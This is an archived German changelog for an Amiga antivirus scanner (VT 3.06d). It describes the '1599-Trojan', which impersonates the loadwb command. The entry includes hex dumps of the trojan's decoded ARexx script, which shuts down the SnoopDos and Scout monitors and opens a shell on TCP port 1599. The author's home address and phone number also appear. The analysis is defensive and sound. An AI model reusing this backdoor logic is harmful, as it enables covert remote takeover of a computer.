home *** CD-ROM | disk | FTP | other *** search
/ EnigmA Amiga Run 1998 July / EnigmA AMIGA RUN 29 (1998)(G.R. Edizioni)(IT)[!][issue 1998-07 & 08].iso / earcd / utils / vttest3 / schutz / vt3.06d-kurz < prev    next >
Text File  |  1998-03-01  |  4KB  |  80 lines
  1.  
  2.    Heiner Schneegold
  3.    Am Steinert 8
  4.    97246 Eibelstadt
  5.    (Deutschland)
  6.  
  7.    Tel: 09303/99104
  8.    (19.00 - 20.00 Uhr)
  9.    EMail: Heiner.Schneegold@t-online.de
  10.  
  11.   letzte Aenderung: 98-03-01
  12.  
  13.   Aenderungen seit VT3.05    VT-Laenge: 366144 Bytes
  14.  
  15.    WICHTIG !!!!!
  16.       Um Linkviren SICHER zu finden, die sich HINTER
  17.       den 1.Hunk linken, MUESSEN Sie FileTest auf-
  18.       rufen !!!
  19.  
  20.    - 1599-Trojan  (Computer-Uebernahme)     98-02-27/28
  21.            ;
  22.   ------ bitte die Texte in VT.kennt.A-Z einfuegen --------
  23.          
  24.    - 1599-Trojan   (Computer-Uebernahme)
  25.       Mehrere Files sind notwendig 
  26.       VT bietet loeschen an. Bitte kopieren Sie den Orginal-Loadwb-
  27.       Befehl neu.
  28.       WICHTIG !!! WICHTIG !!!!
  29.       Das Installer-File und/oder Archiv ist UNBEKANNT. Bitte
  30.       suchen Sie mit ???
  31.       c:loadwb (falsch)       gepackt:  1192 Bytes
  32.                               entpackt:  748 Bytes
  33.       l:startup.handler  (loadwb echt)  1136 Bytes
  34.       l:background.handler              1700 Bytes
  35.       Meine Meinung: KEIN Programm OHNE Hintergedanken verschiebt
  36.       ein Programm aus c: nach l: und nimmt dessen Name an.
  37.       In loadwb (falsch) entpackt ist zu lesen:
  38.           ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
  39.           3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
  40.           616e646c 6572004c 3a737461 72747570 andler.L:startup
  41.           2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
  42.           74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..
  43.       In Wirklichkeit werden also mit DOS-Execute drei Programme
  44.       gestartet.
  45.       background.handler enthaelt einen mehrfach-codierten Bereich.
  46.       Im Speicher entsteht:
  47.           00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
  48.           73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
  49.           20313020 6d696e27 3b3b6966 2073686f  10 min';;if sho
  50.           77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
  51.           20746865 6e207369 676e616c 20534e4f  then signal SNO
  52.           4f505445 53543b65 6c736520 7369676e OPTEST;else sign
  53.           616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
  54.           3b696620 73686f77 28277027 2c27414d ;if show('p','AM
  55.           49544350 27292074 68656e20 7369676e ITCP') then sign
  56.           616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
  57.           65207369 676e616c 20544553 54313b53 e signal TEST1;S
  58.           4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
  59.           77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
  60.           29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
  61.           7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
  62.           454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
  63.           54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
  64.           69662073 686f7728 2770272c 2753434f if show('p','SCO
  65.           55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
  66.           64647265 73732073 636f7574 2e312051 ddress scout.1 Q
  67.           5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
  68.           4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
  69.           7320636f 6d6d616e 64202752 756e203c s command 'Run <
  70.           3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
  71.           43503a31 35393927 3b736967 6e616c20 CP:1599';signal
  72.           54455354 313b6578 69740000          TEST1;exit..
  73.       Eine ARexx-Programmierung, eine Zeitschleife, Test auf Snoopdos
  74.       und Scout, newshell.
  75.       Nach Fremdaussage:
  76.       Es sollen unberechtigte Zugriffe (Passwoerter ausspaehen,
  77.       Format Partition) erfolgt sein.
  78.  
  79.  
  80.